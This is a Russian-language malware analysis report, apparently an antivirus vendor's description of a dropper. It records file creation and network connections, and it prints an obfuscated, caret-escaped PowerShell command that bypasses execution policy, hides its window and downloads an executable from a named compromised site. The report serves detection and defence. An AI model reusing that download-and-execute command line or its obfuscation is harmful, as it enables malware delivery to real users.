Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "po^WErSh^e^l^l^.eX^E -E^xEcU^tioNpoLicY ^By^P^A^sS^ ^-nOp^ROFI^LE^ -w^iND^oW^style^ H^IDdE^n^ (^NEw-O^b^J^e^Ct^ sYSTem.n^e^t.w^eb^cl^IEN^t).D^O^wNL^oad^fIl^e('http://nexcont...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
TCP
Запросы HTTP GET
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
UDP
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "po^WErSh^e^l^l^.eX^E -E^xEcU^tioNpoLicY ^By^P^A^sS^ ^-nOp^ROFI^LE^ -w^iND^oW^style^ H^IDdE^n^ (^NEw-O^b^J^e^Ct^ sYSTem.n^e^t.w^eb^cl^IEN^t).D^O^wNL^oad^fIl^e('http://nexcont...' (со скрытым окном)
